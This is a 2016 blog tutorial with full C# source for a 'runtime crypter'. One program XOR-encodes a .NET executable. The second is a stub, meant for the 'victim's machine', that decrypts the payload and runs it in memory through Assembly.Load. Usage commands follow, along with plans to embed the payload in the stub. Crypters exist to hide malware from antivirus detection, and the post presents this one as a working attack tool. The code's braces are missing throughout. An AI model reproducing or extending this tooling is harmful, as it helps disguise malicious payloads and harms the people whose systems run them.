25 Ağustos 2016 Perşembe

[C#] A Simple Runtime Crypter

I think everyone of you has had the dream of building his own crypter; I know I have (for about a year, now).
Everyone has heard of this "black magic" (as @dtm mentioned in his post). But, maybe some of you, like me, were unsuccessful in programming one.
A crypter in C# is not as useful as one in C++, but that's besides the point.
  • C++: Complex, but handles the low-level stuff much better
  • C#: Very easy; excellent for creating a basic introduction to crypters.
I'll cover the aspects necessary to built a crypter, and because it's in C#, I can omit the complex, low-level stuff usually associated with this technique.

How does a Runtime Crypter work?

@dtm already wrote a good explanation, so I'll shorten it here a bit. For a detailed introduction, see his post!

On the attacker's machine (Crypter)

  1. Load Payload
  2. Encrypt Payload
  3. Build Stub and Add Payload
At this point I have to say that this crypter has two downsides:
  1. It can only run .NET executables,
  2. and, currently, the encrypted payload has to be given away with the stub in it own file! So you have thestub.exe and payload.bin/dat/jgp. The name of the file is your choice.

On the victims machine (Stub)

  1. Load encrypted Payload
  2. Decrypt Payload
  3. Run Payload
Everything's done in memory and not on the hard drive!

Source of the Crypter

I think it's well commented so I will just paste it here:
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

using System.IO;

namespace Crypter
    class Program
        static void Main(string[] args)
            //No Arguments -> Exit
            if (args.Length < 2)
                Console.WriteLine("Syntax: crypter.exe <Exe/Dll to get Encrypted> <Password> (Optional: output file name)");

            String file = args[0];
            String pass = args[1];
            String outFile = "Crypted.exe";

            //If Output Name is specified -> Set it
            if (args.Length == 3)
                outFile = args[2];

            //File doesn't exist -> Exit
            if (!File.Exists(file))
                Console.WriteLine("[!] The selected File doesn't exist!");

            //Everything seems fine -> Reading bytes
            Console.WriteLine("[*] Reading Data...");
            byte[] plainBytes = File.ReadAllBytes(file);

            //Yep, got bytes -> Encoding
            Console.WriteLine("[*] Encoding Data...");
            byte[] encodedBytes = encodeBytes(plainBytes, pass);

            Console.Write("[*] Save to Output File... ");
            File.WriteAllBytes(outFile, encodedBytes);

            Console.WriteLine("\n[*] File successfully encoded!");
If you have any questions about the source, just ask in the comments! The encoding function:
private static byte[] encodeBytes(byte[] bytes, String pass)
    byte[] XorBytes = Encoding.Unicode.GetBytes(pass);

    for (int i = 0; i < bytes.Length; i++)
        bytes[i] ^= XorBytes[i % 16];

    return bytes;
This is a simple XOR-Encryption scheme (refer to @dtm's article) that uses a password in the form of a byte array.

Source of the Stub

It's a rather bad implementation, since you have to hard-code the filenames and the encryption password. Anyway, this is more of a proof-of-concept. C# is not very useful in the production of malware.
using System;
using System.Collections.Generic;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;

using System.IO;
using System.Text;
using System.Reflection;
using System.Diagnostics;

namespace Stub
    static class Program
        /// <summary>
        /// MAIN
        /// </summary>
        static void Main()
            //Application.Run(new Form1());

            //Set Payload File and Password HERE
            RunInternalExe("Crypted.exe", "password");

        private static void RunInternalExe(string exeName, String pass)
            //Verify the Payload exists
            if (!File.Exists(exeName))

            //Read the raw bytes of the file
            byte[] resourcesBuffer = File.ReadAllBytes(exeName);

            //Decrypt bytes from payload
            byte[] decryptedBuffer = null;
            decryptedBuffer = decryptBytes(resourcesBuffer, pass);

            //If .NET executable -> Run
                //Load the bytes as an assembly
                Assembly exeAssembly = Assembly.Load(decryptedBuffer);

                //Execute the assembly
                object[] parameters = new object[1];                //Don't know why but fixes TargetParameterCountException
                exeAssembly.EntryPoint.Invoke(null, parameters);

        /// <summary>
        /// Decrypt the Loaded Assembly Bytes
        /// </summary>
        /// <param name="payload"></param>
        /// <returns>Decrypted Bytes</returns>
        private static byte[] decryptBytes(byte[] bytes, String pass)
            byte[] XorBytes = Encoding.Unicode.GetBytes(pass);

            for (int i = 0; i < bytes.Length; i++)
                bytes[i] ^= XorBytes[i % 16];

            return bytes;
You may notice that the encryption and decryption functions are identical. This is how XOR encryption works.
That's all for the source code...


First, you have to encrypt your payload. This can be done like so:
crypter.exe <payload file> <encryption password> <output filename>
Next, copy the encrypted file to the folder containing the stub and execute the stub. Don't forget to change the file name and password in the stubs source! Everything should work as expected!*
* Tested on Win7/Visual Studio 2015)


You may have wanted to write your own crypter, but lacked the low-level programming knowledge necessary.
This C# Crypter can be seen as an introduction to crypters -- it is unpolished. I'll work on the crypter in the coming days, add support for Windows executables that are not .NET binaries, and write a stub-builder function, so that you don't need the stub and the encrypted file, but only the stub containing the payload. And, you won't have to change the password and file name every time!
Stay tuned for updates!